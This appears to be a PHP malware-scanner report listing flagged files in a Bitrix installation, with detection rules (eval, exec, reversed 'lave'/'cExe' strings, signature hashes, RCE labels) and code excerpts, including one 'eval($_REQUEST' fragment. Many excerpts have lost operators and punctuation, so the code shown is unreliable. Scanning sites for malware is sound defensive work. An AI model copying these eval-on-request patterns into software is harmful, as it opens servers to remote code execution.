Potentially dangerous function `exec`

[https://www.php.net/exec]

exec($phpPath.' -v'$arPhpLines); if(is_array($arPhpLines) && isset($arPhpLines[0]) && preg_match('/PHP\s*([\d\.]+)/i'$arPhpLines[0], $m)) { $res $m[1]; if(preg_match('/PHP\s*([\d\.]+)\s*\(([^\)]+)\)/i'$arPhpLines[0], $m)) { $res .= '|'.$m[2]; } } } echo $res; die(); } if(!defined('NO_AGENT_CHECK')) define('NO_AGENT_CHECK'true); $docRoot rtrim($_SERVER["DOCUMENT_ROOT"], '/'); require_once($docRoot."/bitrix/modules/main/include/prolog_admin_before.php"); $moduleId 'kda.importexcel'; ...

/home/web/web/vsavto.com/public_html/bitrix/modules/gorillas.dadata/lang/en/install/index.php

Size: 1.88 kB Created: 2024-06-18 07:55:14 Modified: 2025-02-03 05:36:35 Dangers: 1
DescriptionMatch

Function strrev eval_strrev Line: 17 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

LAVE

/home/web/web/vsavto.com/public_html/bitrix/modules/gorillas.dadata/lang/ru/install/index.php

Size: 1.88 kB Created: 2024-06-18 07:55:14 Modified: 2025-02-03 05:36:35 Dangers: 1
DescriptionMatch

Function strrev eval_strrev Line: 17 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

LAVE

/home/web/web/vsavto.com/public_html/bitrix/modules/asd.iblock/classes/general/iblock_action.php

Size: 38.10 kB Created: 2022-12-02 17:29:18 Modified: 2025-02-03 05:36:36 Dangers: 1
DescriptionMatch

Exploit download_remote_code2 Line: 50 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($hdlOutputCASDiblockTools::ExportPropsToXML($BID$_REQUEST['p'])

/home/web/web/vsavto.com/public_html/bitrix/modules/ram.watermark/classes/image.php

Size: 26.31 kB Created: 2024-07-25 07:51:46 Modified: 2025-02-03 05:36:36 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec("which jpegtran"))) { exec("jpegtran -progressive -copy none -optimize -outfile ".$destination." ".$destination); } else if (strlen(exec("which jpegoptim"))) { exec("jpegoptim ".$destination." -q --strip-all -–all-progressive"); } break; } case "image/png": { if (strlen(exec("which optipng"))) { exec("optipng -o2 -strip all ".$destination); } break; } case "image/webp": { if (strlen(exec("which cwebp"))) { exec("cwebp -lossless ".$destination." -o ".$destination); } break; } } } } public ...

/home/web/web/vsavto.com/public_html/bitrix/modules/forum/install/components/bitrix/forum.rules/lang/en/component.php

Size: 4.71 kB Created: 2022-12-02 17:29:20 Modified: 2025-02-03 05:36:36 Dangers: 1
DescriptionMatch

Sign 407651f7 Line: 27 Dangerous

Malware Signature (hash: 407651f7)

warez

/home/web/web/vsavto.com/public_html/bitrix/modules/tinkoff.payment/install/sale_payment/tinkoff/lang/en/.description.php

Size: 5.72 kB Created: 2022-12-26 09:23:38 Modified: 2025-02-03 05:36:36 Warns: 1
DescriptionMatch

Function system Warning

Potentially dangerous function `system`

[https://www.php.net/system]

system(usn_income)'; $MESS['SALE_TINKOFF_TAXATION_USN_IMCOME_OUTCOME'] = 'Simplified taxation system(usn_income_outcome)'; $MESS['SALE_TINKOFF_TAXATION_ENVD'] = 'Unified tax of imputed income(envd)'; $MESS['SALE_TINKOFF_TAXATION_ESN'] = 'Unified agricultural tax(esn)'; $MESS['SALE_TINKOFF_TAXATION_PATENT'] = 'Patent system of taxation(patent)

/home/web/web/vsavto.com/public_html/bitrix/modules/tinkoff.payment/install/sale_payment/tinkoff/lang/en/result.php

Size: 5.54 kB Created: 2022-12-26 09:23:38 Modified: 2025-02-03 05:36:36 Warns: 1
DescriptionMatch

Function system Warning

Potentially dangerous function `system`

[https://www.php.net/system]

system(usn_income)'; $MESS['SALE_TINKOFF_TAXATION_USN_IMCOME_OUTCOME'] = 'Simplified taxation system(usn_income_outcome)'; $MESS['SALE_TINKOFF_TAXATION_ENVD'] = 'Unified tax of imputed income(envd)'; $MESS['SALE_TINKOFF_TAXATION_ESN'] = 'Unified agricultural tax(esn)'; $MESS['SALE_TINKOFF_TAXATION_PATENT'] = 'Patent system of taxation(patent)

/home/web/web/vsavto.com/public_html/bitrix/modules/tinkoff.payment/install/sale_payment/tinkoff/en/tinkoff.php

Size: 3.60 kB Created: 2022-12-26 09:23:38 Modified: 2025-02-03 05:36:36 Warns: 1
DescriptionMatch

Function system Warning

Potentially dangerous function `system`

[https://www.php.net/system]

system(usn_income)'; $MESS['SALE_TINKOFF_TAXATION_USN_IMCOME_OUTCOME'] = 'Simplified taxation system(usn_income_outcome)'; $MESS['SALE_TINKOFF_TAXATION_ENVD'] = 'Unified tax of imputed income(envd)'; $MESS['SALE_TINKOFF_TAXATION_ESN'] = 'Unified agricultural tax(esn)'; $MESS['SALE_TINKOFF_TAXATION_PATENT'] = 'Patent system of taxation(patent)

/home/web/web/vsavto.com/public_html/bitrix/modules/form/classes/general/form_callformoutput.php

Size: 33.80 kB Created: 2022-12-02 17:29:23 Modified: 2025-02-03 05:36:36 Warns: 1 Dangers: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('?>'.$this->__cache_tpl.'<?'); $strReturn ob_get_contents(); ob_end_clean(); return $strReturn; } else { return false; } } function IncludeFormTemplate() { global $APPLICATION; if ($this->__check_form_cache()) { $APPLICATION->SetTemplateCSS("form/form.css"); $FORM =& $this; eval($this->__cache_tpl); return true; } else { return false; } } function isStatisticIncluded() { return CModule::IncludeModule("statistic"); } function __check_form_cache() { global $CACHE_MANAGER; if ($this->arForm[...

Sign 11413268 Line: 100 Dangerous

Malware Signature (hash: 11413268)

eval('?>

/home/web/web/vsavto.com/public_html/bitrix/modules/form/options.php

Size: 17.64 kB Created: 2022-12-02 17:29:23 Modified: 2025-02-03 05:36:36 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(data.URL);
        if (!
res)
        {
            var 
proto data.URL.match(/\.bitrix24\./) ? 'https' 'http';

            
data.URL proto '://' data.URL;
            
res r.exec(data.URL);
        }

        if (
res)
        {
            
data.URL_SERVER res[1]+'://'+res[2];
            
data.URL_PATH res[3];
        }
    }

    if (!
data.AUTH_HASH)
    {
        var 
content '<div class="form-crm-settings"><form name="form_'+popup_id+'"><table cellpadding="0" cellspacing="2" border="0"><tr><td align="right"><?=CUtil::JSEscape(GetMessage('FORM_TAB_CRM_ROW_TITLE'))?>:</...

/home/web/web/vsavto.com/public_html/bitrix/modules/form/admin/form_field_edit.php

Size: 29.21 kB Created: 2022-12-02 17:29:23 Modified: 2025-02-03 05:36:36 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('function() {FIELD_TYPE_CHANGE(\'' + (rows_count+1) + '\'); jsFormValidatorSettings.UpdateAll();}');
            
arInputs[i].onchange = new Function('FIELD_TYPE_CHANGE(\'' + (rows_count+1) + '\'); jsFormValidatorSettings.UpdateAll();');
        }

        if (
new_name == 'MESSAGE_' + (rows_count+1))
        {
            
arInputs[i].onchange jsFormValidatorSettings.UpdateAll;
        }
    }

    var 
input1 BX.create('INPUT', {
        
props: {
            
type'hidden',
            
name'ANSWER[]',
            
valuerows_count 1
        
}
    }),
        
input2 BX.create('...

/home/web/web/vsavto.com/public_html/bitrix/modules/fileman/classes/general/editor_utils.php

Size: 8.42 kB Created: 2022-12-02 17:29:24 Modified: 2025-02-03 05:36:36 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($code); echo '#BX_RENDERED_COMPONENT#'$s ob_get_contents(); ob_end_clean(); return $s; } public static function _RenderAllComponents($arParams$bLPA) { global $APPLICATION$USER$s ''$arPHP PHPParser::ParseFile($arParams['source']); $l count($arPHP); if ($l 0) { $new_source ''$end 0$comp_count 0ob_start(); for ($n 0$n<$l$n++) { $src $arPHP[$n][2]; if (mb_substr($src05) == "<?"."php"$src mb_substr($src5); else $src mb_substr($src2); $src m...

/home/web/web/vsavto.com/public_html/bitrix/modules/fileman/admin/fileman_admin.php

Size: 51.08 kB Created: 2022-12-02 17:29:27 Modified: 2025-02-03 05:36:36 Warns: 1
DescriptionMatch

Function posix_getpwuid Warning

Potentially dangerous function `posix_getpwuid`

[https://www.php.net/posix_getpwuid]

posix_getpwuid(fileowner($fnameConverted)); $arrFileGroup posix_getgrgid(filegroup($fnameConverted)); $showField .= " ".$arrFileOwner['name']." ".$arrFileGroup['name']; } } else $showField "&nbsp;"; } $row->AddField("PERMS"$showField); } $showField ""; if (in_array("PERMS_B"$arVisibleColumns)) { $showField "&nbsp;"; if(($USER->CanDoOperation('fileman_view_permissions') || $USER->CanDoOperation('fileman_edit_all_settings')) && $USER->CanDoFileOperation('fm_view_permission'$arPath)) ...

/home/web/web/vsavto.com/public_html/bitrix/modules/learning/admin/learn_unilesson_edit.php

Size: 48.84 kB Created: 2022-12-02 17:29:28 Modified: 2025-02-03 05:36:36 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('JSConfig = ' b4); } catch (e) { JSConfig false; }
            if (!
id || !JSConfig)
                return 
'';

            var 
= (parseInt(JSConfig.width) || 50);
            var 
= (parseInt(JSConfig.height) || 25);

            var 
arTagParams = {fileJSConfig.file};
            var 
bxTag =  pMainObj.GetBxTag(id);

            if (
bxTag && bxTag && bxTag.tag == "media")
            {
                
arTagParams.id id;
            }
            return 
'<img  id="' pMainObj.SetBxTag(false, {tag'media'paramsarTagParams}) + '" src="/bitrix/images/1.gif" style="border: 1px sol...

/home/web/web/vsavto.com/public_html/bitrix/modules/learning/admin/learn_question_edit.php

Size: 38.88 kB Created: 2022-12-02 17:29:28 Modified: 2025-02-03 05:36:36 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('JSConfig = ' b4); } catch (e) { JSConfig false; }
            if (!
id || !JSConfig)
                return 
'';

            var 
= (parseInt(JSConfig.width) || 50);
            var 
= (parseInt(JSConfig.height) || 25);

            var 
arTagParams = {fileJSConfig.file};
            var 
bxTag =  pMainObj.GetBxTag(id);

            if (
bxTag && bxTag && bxTag.tag == "media")
            {
                
arTagParams.id id;
            }
            return 
'<img  id="' pMainObj.SetBxTag(false, {tag'media'paramsarTagParams}) + '" src="/bitrix/images/1.gif" style="border: 1px sol...

/home/web/web/vsavto.com/public_html/bitrix/modules/photogallery/install/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php

Size: 9.56 kB Created: 2022-12-02 17:29:29 Modified: 2025-02-03 05:36:36 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("var result = " data "; "); }
            if (
result['status'] == 'inprogress')
            {
                
document.getElementById('photogallery_recalc').innerHTML result['text'];
                if (
__this_source.bReady == false)
                {
                    
document.getElementById('ButtonPhotoGalleryRecalcStart').disabled false;
                    
document.getElementById('ButtonPhotoGalleryRecalcContinue').disabled false;
                    
document.getElementById('ButtonPhotoGalleryRecalcStop').disabled true;
                }
                else
                {
                    
document.getElementById(...

/home/web/web/vsavto.com/public_html/bitrix/modules/photogallery/install/components/bitrix/photogallery.detail.list/templates/slider_big/template.php

Size: 16.21 kB Created: 2022-12-02 17:29:29 Modified: 2025-02-03 05:36:36 Warns: 1
DescriptionMatch

Function eval Line: 337 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("div.onclick = function(e){jsUtils.PreventDefault(e); jsUtils.Redirect([], '" res[ii].href "');};");
        
res[ii].parentNode.insertBefore(divres[ii]);
        
res[ii].onmouseover = function()
        {
            
this.previousSibling.onshow();
            
this.bxMouseOver 'Y';
        };
        
res[ii].onmouseout = function()
        {
            
this.bxMouseOver 'N';
            var 
__this this;
            
setTimeout(
                function()
                {
                    if (
__this.previousSibling && __this.previousSibling.bxMouseOver != "Y")
                    {
                        
__this.previousSibling...

/home/web/web/vsavto.com/public_html/bitrix/modules/photogallery/install/components/bitrix/photogallery.detail.list.ex/templates/.default/template.php

Size: 12.71 kB Created: 2022-12-02 17:29:30 Modified: 2025-02-03 05:36:36 Warns: 1
DescriptionMatch

Exploit infected_comment Line: 110 Warning

Comments composed by 5 random chars usually used to detect if a file is infected yet

/*width*/

/home/web/web/vsavto.com/public_html/bitrix/modules/perfmon/admin/perfmon_row_edit.php

Size: 18.78 kB Created: 2022-12-02 17:29:30 Modified: 2025-02-03 05:36:36 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("return ".$tokens[$pos][1].";"); $pos++; } elseif ($tokens[$pos][0] === T_LNUMBER || $tokens[$pos][0] === T_DNUMBER || $tokens[$pos][0] === T_CONSTANT_ENCAPSED_STRING) { $result = eval("return ".$tokens[$pos][1].";"); $pos++; } elseif ($tokens[$pos][0] === T_ARRAY) { $pos++; while (isset($tokens[$pos]) && $tokens[$pos][0] === T_WHITESPACE$pos++; if ($tokens[$pos][0] !== "(") return; else $pos++; $result = array(); while (true) { while (isset($tokens[$pos]) && $tokens[$pos][0] === T_WHITES...

/home/web/web/vsavto.com/public_html/bitrix/modules/perfmon/admin/perfmon_db_server.php

Size: 31.58 kB Created: 2022-12-02 17:29:30 Modified: 2025-02-03 05:36:36 Dangers: 1
DescriptionMatch

Function strrev eval_strrev Line: 632 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

/home/web/web/vsavto.com/public_html/bitrix/modules/b24connector/install/components/bitrix/b24connector.button.list/ajax.php

Size: 4.51 kB Created: 2022-12-02 17:29:30 Modified: 2025-02-03 05:36:36 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { $this->request Context::getCurrent()->getRequest(); $this->action $this->request->get('action'); $this->prepareRequestData(); if($this->check()) { call_user_func_array($this->getActionCall(), array($this->requestData)); } $this->giveResponse(); } } $controller = new B24CButtonListAjaxController(); $controller->exec()

/home/web/web/vsavto.com/public_html/bitrix/modules/clouds/admin/clouds_file_list.php

Size: 36.67 kB Created: 2022-12-02 17:29:31 Modified: 2025-02-03 05:36:37 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 236 Dangerous

Malware Signature (hash: 11413268)

eval($_REQUEST

/home/web/web/vsavto.com/public_html/bitrix/modules/expansio.generator/admin/expansio_generator/modules/phpmorphy-0.3.7/utils/libs/decorator.php

Size: 6.79 kB Created: 2024-09-17 07:33:31 Modified: 2025-02-03 05:36:37 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($this->_createClassCode() . " return true;"); } protected function _createClassCode() { $implements ''$interfaces lmbReflectionHelper :: getInterfaces($this->_class); if(function_exists('spl_classes')) $interfaces array_diff($interfaces, array('Traversable')); if(count($interfaces) > 0$implements 'implements ' implode(', '$interfaces); $code "class " $this->_decorator_class " extends " $this->_decorator_base $implements {\n"$code .= "    function __construct(\$...

/home/web/web/vsavto.com/public_html/bitrix/modules/expansio.generator/admin/expansio_generator/modules/phpmorphy-0.3.7/bin/build_dict.php

Size: 4.81 kB Created: 2024-09-17 07:33:31 Modified: 2025-02-03 05:36:37 Warns: 2
DescriptionMatch

Function proc_close Warning

Potentially dangerous function `proc_close`

[https://www.php.net/proc_close]

proc_close($handle); if($errorcode) { doError"\n\nCommand '" $cmd .'\' exit with code = ' $errorcode ', error = \'' $stderr '\'' ); } echo "OK.\n"; } function get_locale($xml) { $reader = new XMLReader(); if(false === $reader->open($xml)) { return false; } while($reader->read()) { if($reader->nodeType == XMLReader::ELEMENT) { if($reader->localName === 'locale') { $result $reader->getAttribute('name'); $result strlen($result) ? $result false; break; } } } $reader->close(); retur...

Function proc_open Warning

Potentially dangerous function `proc_open`

[https://www.php.net/proc_open]

proc_open($cmd$desc$pipesnullnull$opts))) { doError('Can`t execute \'' $cmd '\' command'); } if(1) { while(!feof($pipes[1])) { fputs(STDOUTfgets($pipes[1])); } } else { stream_copy_to_stream($pipes[1], STDOUT); } $stderr trim(stream_get_contents($pipes[2])); fclose($pipes[1]); fclose($pipes[2]); $errorcode proc_close($handle); if($errorcode) { doError"\n\nCommand '" $cmd .'\' exit with code = ' $errorcode ', error = \'' $stderr '\'' ); } echo "OK.\n"; } function g...

/home/web/web/vsavto.com/public_html/bitrix/modules/expansio.generator/modules/phpmorphy-0.3.7/utils/libs/decorator.php

Size: 6.79 kB Created: 2024-09-17 07:34:21 Modified: 2025-02-03 05:36:37 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($this->_createClassCode() . " return true;"); } protected function _createClassCode() { $implements ''$interfaces lmbReflectionHelper :: getInterfaces($this->_class); if(function_exists('spl_classes')) $interfaces array_diff($interfaces, array('Traversable')); if(count($interfaces) > 0$implements 'implements ' implode(', '$interfaces); $code "class " $this->_decorator_class " extends " $this->_decorator_base $implements {\n"$code .= "    function __construct(\$...

/home/web/web/vsavto.com/public_html/bitrix/modules/expansio.generator/modules/phpmorphy-0.3.7/bin/build_dict.php

Size: 4.81 kB Created: 2024-09-17 07:34:21 Modified: 2025-02-03 05:36:37 Warns: 2
DescriptionMatch

Function proc_close Warning

Potentially dangerous function `proc_close`

[https://www.php.net/proc_close]

proc_close($handle); if($errorcode) { doError"\n\nCommand '" $cmd .'\' exit with code = ' $errorcode ', error = \'' $stderr '\'' ); } echo "OK.\n"; } function get_locale($xml) { $reader = new XMLReader(); if(false === $reader->open($xml)) { return false; } while($reader->read()) { if($reader->nodeType == XMLReader::ELEMENT) { if($reader->localName === 'locale') { $result $reader->getAttribute('name'); $result strlen($result) ? $result false; break; } } } $reader->close(); retur...

Function proc_open Warning

Potentially dangerous function `proc_open`

[https://www.php.net/proc_open]

proc_open($cmd$desc$pipesnullnull$opts))) { doError('Can`t execute \'' $cmd '\' command'); } if(1) { while(!feof($pipes[1])) { fputs(STDOUTfgets($pipes[1])); } } else { stream_copy_to_stream($pipes[1], STDOUT); } $stderr trim(stream_get_contents($pipes[2])); fclose($pipes[1]); fclose($pipes[2]); $errorcode proc_close($handle); if($errorcode) { doError"\n\nCommand '" $cmd .'\' exit with code = ' $errorcode ', error = \'' $stderr '\'' ); } echo "OK.\n"; } function g...

/home/web/web/vsavto.com/public_html/bitrix/modules/scale/lib/actionmodifyer.php

Size: 4.10 kB Created: 2022-12-02 17:29:31 Modified: 2025-02-03 05:36:37 Dangers: 2
DescriptionMatch

Function strrev eval_strrev Line: 14 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

LAVE

Function strrev eval_strrev Line: 22 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

/home/web/web/vsavto.com/public_html/bitrix/modules/scale/lib/helper.php

Size: 5.30 kB Created: 2022-12-02 17:29:31 Modified: 2025-02-03 05:36:37 Dangers: 2
DescriptionMatch

Exploit php_uname Line: 211 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine

php_uname('s')

Function strrev exec_strrev Line: 186 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cExe

/home/web/web/vsavto.com/public_html/bitrix/modules/scale/lib/action.php

Size: 7.27 kB Created: 2022-12-02 17:29:31 Modified: 2025-02-03 05:36:37 Warns: 1 Dangers: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($paramCode); $retStr str_replace('##CODE_PARAMS:'.$paramId.'##'$res$retStr); } } foreach ($this->freeParams as $key => $paramValue$retStr str_replace('##'.$key.'##'$paramValue$retStr); return $retStr; } public function start(array $inputParams = array()) { if(!is_array($inputParams)) throw new \Bitrix\Main\ArgumentTypeException("inputParams""array"); if(isset($this->actionParams["MODIFYERS"]) && is_array($this->actionParams["MODIFYERS"])) { $needMoreUserInfo false; foreach...

Function strrev exec_strrev Line: 179 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cExe

/home/web/web/vsavto.com/public_html/bitrix/modules/scale/lib/shelladapter.php

Size: 1.88 kB Created: 2022-12-02 17:29:31 Modified: 2025-02-03 05:36:37 Warns: 3 Dangers: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec($command" > ".$outputPath." 2>&1 &"); return true; } public function getLastOutput() { return $this->resOutput; } public function getLastError() { return $this->resError; } public function syncExec($command) { $command $this->prepareExecution($command); $retVal 1$descriptorspec = array( => array("pipe""r"), => array("pipe""w"), => array("pipe""w") ); $pipes = array(); $process proc_open('/bin/bash'$descriptorspec$pipes); if (is_resource($process)) { fwrite($pipes[0...

Function proc_close Line: 93 Warning

Potentially dangerous function `proc_close`

[https://www.php.net/proc_close]

proc_close($process)

Function proc_open Warning

Potentially dangerous function `proc_open`

[https://www.php.net/proc_open]

proc_open('/bin/bash'$descriptorspec$pipes); if (is_resource($process)) { fwrite($pipes[0], $command); fclose($pipes[0]); $this->resOutput stream_get_contents($pipes[1]); fclose($pipes[1]); $this->resError stream_get_contents($pipes[2]); fclose($pipes[2]); $retVal proc_close($process)

Function strrev exec_strrev Line: 39 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cExe

/home/web/web/vsavto.com/public_html/bitrix/modules/scale/lib/monitoring.php

Size: 14.80 kB Created: 2022-12-02 17:29:31 Modified: 2025-02-03 05:36:37 Dangers: 1
DescriptionMatch

Function strrev exec_strrev Line: 335 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cExe

/home/web/web/vsavto.com/public_html/bitrix/modules/scale/lib/serversdata.php

Size: 5.19 kB Created: 2022-12-02 17:29:31 Modified: 2025-02-03 05:36:37 Dangers: 1
DescriptionMatch

Function strrev exec_strrev Line: 39 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cExe

/home/web/web/vsavto.com/public_html/bitrix/modules/scale/lib/provider.php

Size: 6.34 kB Created: 2022-12-02 17:29:31 Modified: 2025-02-03 05:36:37 Dangers: 1
DescriptionMatch

Function strrev exec_strrev Line: 24 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cExe

/home/web/web/vsavto.com/public_html/bitrix/modules/scale/lib/sitesdata.php

Size: 3.12 kB Created: 2022-12-02 17:29:31 Modified: 2025-02-03 05:36:37 Dangers: 1
DescriptionMatch

Function strrev exec_strrev Line: 80 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cExe

/home/web/web/vsavto.com/public_html/bitrix/modules/scale/lib/actionsdata.php

Size: 8.27 kB Created: 2022-12-02 17:29:31 Modified: 2025-02-03 05:36:37 Warns: 1 Dangers: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("return ('{$operand1}{$operator} '{$operand2}');"); } public static function setLogLevel($logLevel) { self::$logLevel $logLevel; } public static function checkRunningAction() { $result = []; $shellAdapter = new ShellAdapter(); $execRes $shellAdapter->syncExec("sudo -u root /opt/webdir/bin/bx-process -a list -o json"); $data $shellAdapter->getLastOutput(); if($execRes) { $arData json_decode($datatrue); $result = []; if(isset($arData["params"]) && is_array($arData["params"])) { fo...

Function strrev exec_strrev Line: 93 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

cExe

/home/web/web/vsavto.com/public_html/bitrix/modules/scale/lang/en/include/actionsdefinitions.php

Size: 4.46 kB Created: 2022-12-02 17:29:31 Modified: 2025-02-03 05:36:37 Dangers: 1
DescriptionMatch

Function strrev eval_strrev Line: 17 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

LAVE

/home/web/web/vsavto.com/public_html/bitrix/modules/scale/lang/ru/include/actionsdefinitions.php

Size: 5.86 kB Created: 2022-12-02 17:29:31 Modified: 2025-02-03 05:36:37 Dangers: 1
DescriptionMatch

Function strrev eval_strrev Line: 17 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

LAVE

/home/web/web/vsavto.com/public_html/bitrix/modules/scale/include/actionsdefinitions.php

Size: 20.57 kB Created: 2022-12-02 17:29:31 Modified: 2025-02-03 05:36:37 Dangers: 2
DescriptionMatch

Function strrev eval_strrev Line: 181 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

LAVE

Function strrev eval_strrev Line: 182 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

/home/web/web/vsavto.com/public_html/bitrix/modules/scale/include/rolesdefinitions.php

Size: 2.59 kB Created: 2022-12-02 17:29:31 Modified: 2025-02-03 05:36:37 Dangers: 2
DescriptionMatch

Function strrev eval_strrev Line: 64 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

Function strrev eval_strrev Line: 68 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

LAVE

/home/web/web/vsavto.com/public_html/bitrix/modules/scale/admin/menu.php

Size: 1.16 kB Created: 2022-12-02 17:29:31 Modified: 2025-02-03 05:36:37 Dangers: 1
DescriptionMatch

Exploit php_uname Line: 13 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine

php_uname('s')

/home/web/web/vsavto.com/public_html/bitrix/modules/bizproc/classes/general/documentservice.php

Size: 41.53 kB Created: 2022-12-02 17:29:31 Modified: 2025-02-03 05:36:37 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("v = " v);

    return 
v;
}

$objectName.GetFieldInputControl4Type = function(typevaluenamesubtypeFunctionNamefunc)
{
    
this.GetFieldInputControlInternal(
        
type,
        
value,
        
name,
        function(
v)
        {
            var 
v.indexOf('<!--__defaultOptionsValue:');
            if (
>= 0)
            {
                
'<!--__defaultOptionsValue:'.length;
                var 
p1 v.indexOf('-->'p);
                
type['Options'] = v.substring(pp1);
            }

            var 
newPromt "";

            
v.indexOf('<!--__modifyOptionsPromt:');
            if (
>= 0)
            ...

/home/web/web/vsavto.com/public_html/bitrix/modules/bizproc/classes/general/virtualdocument.php

Size: 66.80 kB Created: 2022-12-02 17:29:31 Modified: 2025-02-03 05:36:37 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(this.arUserTypes[type.substr(2)] + "(\"" field "\", \"" value "\")");
            
//}
            
else // type == "S"
            
{
                
+= '<input type="text" size="40" id="id_' field '" name="' inputName '" value="' this.HtmlSpecialChars(value) + '">';
            }

            if (
bAddSelection)
                
+= '<br /><input type="text" id="id_' field '" name="' inputName '" value="' this.HtmlSpecialChars(value) + '">';

            if (
bAddButton && showAddButton)
                
+= '<input type="button" value="..." onclick="B...

/home/web/web/vsavto.com/public_html/bitrix/modules/bizproc/classes/general/runtime.php

Size: 25.48 kB Created: 2022-12-02 17:29:31 Modified: 2025-02-03 05:36:37 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('class CBP'.static::REST_ACTIVITY_PREFIX.$code.' extends CBPRestActivity {const REST_ACTIVITY_ID = '.($activity$activity['ID'] : 0).';}'); $this->loadedActivities[] = static::REST_ACTIVITY_PREFIX.$code; return true; } return false; } public function getActivityDescription($code$lang false) { if (preg_match("#[^a-zA-Z0-9_]#"$code)) return null; if ($code == '') return null$code mb_strtolower($code); if (mb_substr($code03) == "cbp"$code mb_substr($code3); if ($code == ''...

/home/web/web/vsavto.com/public_html/bitrix/modules/bizproc/install/activities/bitrix/codecondition/codecondition.php

Size: 1.87 kB Created: 2022-12-02 17:29:31 Modified: 2025-02-03 05:36:37 Warns: 1 Dangers: 2
DescriptionMatch

Exploit silenced_eval Line: 19 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine

@eval("\$result = ".$this->condition.";")

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("\$result = ".$this->condition.";"); return $result; } public static function ValidateProperties($value nullCBPWorkflowTemplateUser $user null) { $arErrors = array(); if ($user == null || !$user->isAdmin()) { $arErrors[] = [ 'code' => 'perm''message' => GetMessage('BPCC_NO_PERMS'), ]; } return array_merge($arErrorsparent::ValidateProperties($value$user)); } public static function GetPropertiesDialog$documentType$arWorkflowTemplate$arWorkflowParameters$arWorkflowVariables...

Sign 696317c4 Line: 19 Dangerous

Malware Signature (hash: 696317c4)

@eval("\

/home/web/web/vsavto.com/public_html/bitrix/modules/bizproc/install/activities/bitrix/codeactivity/codeactivity.php

Size: 2.44 kB Created: 2022-12-02 17:29:31 Modified: 2025-02-03 05:36:37 Warns: 1 Dangers: 1
DescriptionMatch

Exploit silenced_eval Line: 16 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine

@eval($this->ExecuteCode)

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($this->ExecuteCode); return CBPActivityExecutionStatus::Closed; } public static function ValidateProperties($arTestProperties = array(), CBPWorkflowTemplateUser $user null) { $arErrors = array(); if ($user == null || !$user->isAdmin()) { $arErrors[] = array( "code" => "perm""message" => GetMessage("BPCA_NO_PERMS"), ); } if ($arTestProperties["ExecuteCode"] == '') { $arErrors[] = array( "code" => "emptyCode""message" => GetMessage("BPCA_EMPTY_CODE"), ); } return array_merge($arErrors, ...

/home/web/web/vsavto.com/public_html/bitrix/modules/main/interface/admin_list.php

Size: 46.25 kB Created: 2022-12-02 17:29:40 Modified: 2025-02-03 05:36:38 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(this.form.action[this.form.action.selectedIndex].getAttribute('custom_action'));return false;}" disabled="disabled" class="adm-table-action-button" />
<? endif; ?>
    <span class="
adm-table-counter" id="<?=$this->table_id?>_selected_count"><?=GetMessage('admin_lib_checked')?>: <span>0</span></span>
<? endif; ?>
</div>
